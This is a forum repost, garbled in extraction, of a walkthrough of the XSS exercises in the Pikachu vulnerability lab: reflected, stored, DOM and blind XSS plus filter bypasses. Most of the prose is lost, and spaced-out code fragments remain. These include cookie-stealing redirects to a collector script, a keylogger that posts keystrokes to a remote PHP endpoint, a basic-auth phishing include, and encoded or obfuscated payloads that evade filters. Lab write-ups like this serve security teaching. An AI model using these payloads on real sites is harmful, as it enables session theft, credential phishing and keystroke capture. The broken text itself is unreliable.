[15012] 2020-02-14_Pikachu漏洞靶场系列之XSS

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2020-02-14_Pikachu漏洞靶场系列之XSS P i k a c h u X S S F e n g S e c   F r e e B u f   2 0 2 0 - 0 2 - 1 4 ( C r o s s - S i t e   S c r i p t i n g ) C S S C S S X S S X S S 1 X S S ; 2 X S S ; 3 D O M X S S ; X S S w e b O W A S P   T O P 1 0 X S S X S S X S S X S S ; ; X S S ( G e t ) F 1 2 m a x l e n g t h P a y l o a d X S S ( P o s t ) a d m i n / 1 2 3 4 5 6 使 B u r p 1 2 3 P a y l o a d - C o o k i e G E T P O S T C o o k i e C o o k i e P i k a c h u X S S I P P i k a c h u / p k x s s / x c o o k i e / p o s t . h t m l 2 I P 1 2 7 . 0 . 0 . 1 1 I P 2 I P 访 h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / v u l / x s s / x s s p o s t / p o s t _ l o g i n . p h p ) 使 t e s t / a b c 1 2 3 访 p o s t . h t m l h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / p k x s s / x c o o k i e / p o s t . h t m l ) X S S C o o k i e 访 h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / p k x s s / x c o o k i e / p k x s s _ c o o k i e _ r e s u l t . p h p ) X S S P a y l o a d - X S S J S 访 B a s i c P i k a c h u I P P i k a c h u / p k x s s / x f i s h / f i s h . p h p I P I P / p i k a c h u / h e a d e r ( L o c a t i o n :   ) 访 X S S < / p > < s c r i p t > a l e r t ( 1 ) < / s c r i p t >   < p   c l a s s = " n o t i c e " > w h o   i s   1 2 3 , i   d o n ' t   c a r e ! < / p >   < / p > < s c r i p t > a l e r t ( 1 ) < / s c r i p t >   < h t m l >   < h e a d >   < s c r i p t >   w i n d o w . o n l o a d   =   f u n c t i o n ( )   {       d o c u m e n t . g e t E l e m e n t B y I d ( " p o s t s u b m i t " ) . c l i c k ( ) ;   }   < / s c r i p t >   < / h e a d >   < b o d y >   < f o r m   m e t h o d = " p o s t "   a c t i o n = " h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / v u l / x s s / x s s p o s t / x s s _ r e f l e c t e d _ p o s t . p h p "   < / p > < s c r i p t > a l e r t ( 1 ) < / s c r i p t >   < ? p h p   e r r o r _ r e p o r t i n g ( 0 ) ;   / /   v a r _ d u m p ( $ _ S E R V E R ) ;   i f   ( ( ! i s s e t ( $ _ S E R V E R [ ' P H P _ A U T H _ U S E R ' ] ) )   | |   ( ! i s s e t ( $ _ S E R V E R [ ' P H P _ A U T H _ P W ' ] ) ) )   {   / / i n f o           h e a d e r ( ' C o n t e n t - t y p e : t e x t / h t m l ; c h a r s e t = u t f - 8 ' < s c r i p t   s r c = " h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / p k x s s / x f i s h / f i s h . p h p " > < / s c r i p t >
访 X S S h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / v u l / x s s / x s s _ s t o r e d . p h p ) B a s i c B a s i c P H P p k x s s 使 2 使 X S S 使 访 P H P     H T T P     P H P     A p a c h e     C G I   使 p h p S t u d y C G I P H P X S S - p i k a c h u / p k x s s / r k e y p r e s s / r k . j s 5 4 X S S h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / v u l / x s s / x s s _ s t o r e d . p h p ) r k . j s < s c r i p t   s r c = " h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / p k x s s / x f i s h / x f i s h . p h p ? u s e r n a m e = n a r a k u & p a s s w o r d = 1 2 3 4 " > < / s c r i p t > a j a x . o p e n ( " P O S T " ,   " h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 5 / p k x s s / r k e y p r e s s / r k s e r v e r . p h p " , t r u e ) ; #   a j a x . o p e n ( " P O S T " ,   " h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / p k x s s / r k e y p r e s s / r k s e r v e r . p h p " , t r u e ) ; < s c r i p t   s r c = " h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / p k x s s / r k e y p r e s s / r k . j s " > < / s c r i p t >
r k . j s D O M X S S 便 1 1 1 J S J S s t r P a y l o a d #   o n c l i c k = a l e r t ( 1 ) D O M X S S - x 1 1 1 U R L U R L a P a y l o a d #   o n c l i c k = a l e r t ( 1 ) X S S e m m m . / / 访 h e a d e r ( " A c c e s s - C o n t r o l - A l l o w - O r i g i n : * " ) ; < d i v   i d = " d o m " >     < a   h r e f = " 1 1 1 " > w h a t   d o   y o u   s e e ? < / a > < / d i v > < s c r i p t > f u n c t i o n   d o m x s s ( ) {         v a r   s t r   =   d o c u m e n t . g e t E l e m e n t B y I d ( " t e x t " ) . v a l u e ;         d o c u m e n t . g e t E l e m e n t B y I d ( " d o m " ) . i n n e r H T M L   =   " < a   h r e f = ' " + s t r + " ' > w h a t   d o   y o u   s e e ? < / a > " ; } < / s c r i p t > < a   h r e f = ' 1 1 1 ' > w h a t   d o   y o u   s e e ? < / a > < a   h r e f = '   # '   o n c l i c k = a l e r t ( 1 )   ' > w h a t   d o   y o u   s e e ? < / a > h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 6 / p i k a c h u / v u l / x s s / x s s _ d o m _ x . p h p ? t e x t = 1 1 1 h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 6 / p i k a c h u / v u l / x s s / x s s _ d o m _ x . p h p ? t e x t = 1 1 1 # < s c r i p t > f u n c t i o n   d o m x s s ( ) {         v a r   s t r   =   w i n d o w . l o c a t i o n . s e a r c h ;         v a r   t x s s   =   d e c o d e U R I C o m p o n e n t ( s t r . s p l i t ( " t e x t = " ) [ 1 ] ) ;         v a r   x s s   =   t x s s . r e p l a c e ( / + / g , '   ' ) ; / /     a l e r t ( x s s ) ;         d o c u m e n t . g e t E l e m e n t B y I d ( " d o m " ) . i n n e r H T M L   =   " < a   h r e f = ' " + x s s + " ' > , < / a > " ; } < / s c r i p t > < d i v   i d = " d o m " >         < a   h r e f = " 1 1 1 " > , < / a > < / d i v > < a   h r e f = '   # '   o n c l i c k = a l e r t ( 1 )   ' > , < / a >
X S S C o o k i e C o o k i e h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / v u l / x s s / x s s b l i n d / a d m i n _ l o g i n . p h p ) 使 a d m i n / 1 2 3 4 5 6 C o o k i e X S S < s c r i p t > 使 X S S h t m l s p e c i a l c h a r s h t m l s p e c i a l c h a r s ( ) P H P H T M L & & a m p & q u o t & # 0 3 9 < & l t & g t 1 1 1 < > F 1 2 h t m l s p e c i a l c h a r s ( ) 2 使 E N T _ C O M P A T 使 使 a < s c r i p t >     d o c u m e n t . l o c a t i o n   =   ' h t t p : / / 1 2 7 . 0 . 0 . 1 / p i k a c h u / p k x s s / x c o o k i e / c o o k i e . p h p ? c o o k i e = '   +   d o c u m e n t . c o o k i e ; < / s c r i p t > < S c R i p t > a l e r t ( 1 ) < / s C r i P t > $ v a l u e   =   h t m l s p e c i a l c h a r s ( $ _ G E T [ ' v a l u e ' ] ,   E N T _ C O M P A T ) ; #   2 E N T _ C O M P A T       #   , E N T _ Q U O T E S       #   , E N T _ N O Q U O T E S   #   < a   h r e f = " 1 1 1 "   & q u o t ; & l t ; & g t ; ' = " " > 1 1 1 ' " & l t ; & g t ; < / a >
X S S h r e f i >   a h r e f 使 j a v a s c r i p t J S P a y l o a d h t t p ( s ) h t m l s p e c i a l c h a r s X S S J S i >   J S J S 便 x x x F 1 2 $ m s P a y l o a d x x x ;   a l e r t ( 1 ) ;   / / < / s c r i p t > P a y l o a d x x x < / s c r i p t > < s c r i p t > a l e r t ( 1 ) / / G E T U R L P O S T 访 J S P O S T P O S T X S S C o o k i e C o o k i e d o c u m e n t d o c u m e n t / I P 使 J S x . c o m J S y . c o m J a v a S c r i p t 使 x '   o n c l i c k = ' a l e r t ( 1 ) ' j a v a s c r i p t : a l e r t ( 1 ) < s c r i p t >         $ m s = ' x x x ' ;         i f ( $ m s . l e n g t h   ! =   0 ) {                 i f ( $ m s   = =   ' t m a c ' ) {                         $ ( ' # f r o m j s ' ) . t e x t ( ' t m a c , . . ' )                 } e l s e   { / /                         a l e r t ( $ m s ) ;                         $ ( ' # f r o m j s ' ) . t e x t ( ' . . ' )                 }         } < / s c r i p t > < s c r i p t >         $ m s = ' x x x ' ;   a l e r t ( 1 ) ;   / / ' ;         . . . < / s c r i p t > < s c r i p t >         $ m s = '   x x x ' < / s c r i p t > < s c r i p t > a l e r t ( 1 ) / /   ' ;         . . . < / s c r i p t > h t t p : / /     w w w .       b a i d u . c o m     :   8 0     /     h a c k e r . j s                                               h e a d e r ( " A c c e s s - C o n t r o l - A l l o w - O r i g i n :   x . c o m " ) ; < i m g   s r c = " " >           / /   < s c r i p t   s r c = " " >     / /   J S < l i n k   h r e f = " " >       / /   C S S < i f r a m e   s r c = " " >     / /   < S C r i p T > a l E R t ( 1 ) < / s c R i P t > < s c r i < s c r i p t > p t > a l e r t ( 1 ) < / s c r < / s c r i p t > i p t >
使 x >   a l e r t ( x s s ) U R L >   a l e r t ( x s s ) / H T M L * F e n g S e c F r e e B u f . C O M < s c r < ! - - t e s t - - > i p t > a l e r t ( 1 ) < / s c < ! - - t e s t - - > r i p t > < i m g   s r c = x   o n e r r o r = " a l e r t ( ' x s s ' ) "   / > < i m g   s r c = x   o n e r r o r = " a l e r t % 2 8 % 2 7 x s s % 2 7 % 2 9 "   / > < i m g   s r c = x   o n e r r o r = " a l e r t ( ' x s s ' ) "   / > < i m g   s r c = x   o n e r r o r = " & # 9 7 ; & # 1 0 8 ; & # 1 0 1 ; & # 1 1 4 ; & # 1 1 6 ; & # 4 0 ; & # 3 9 ; & # 1 2 0 ; & # 1 1 5 ; & # 1 1 5 ; & # 3 9 ; & # 4 1 ; "   / >

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则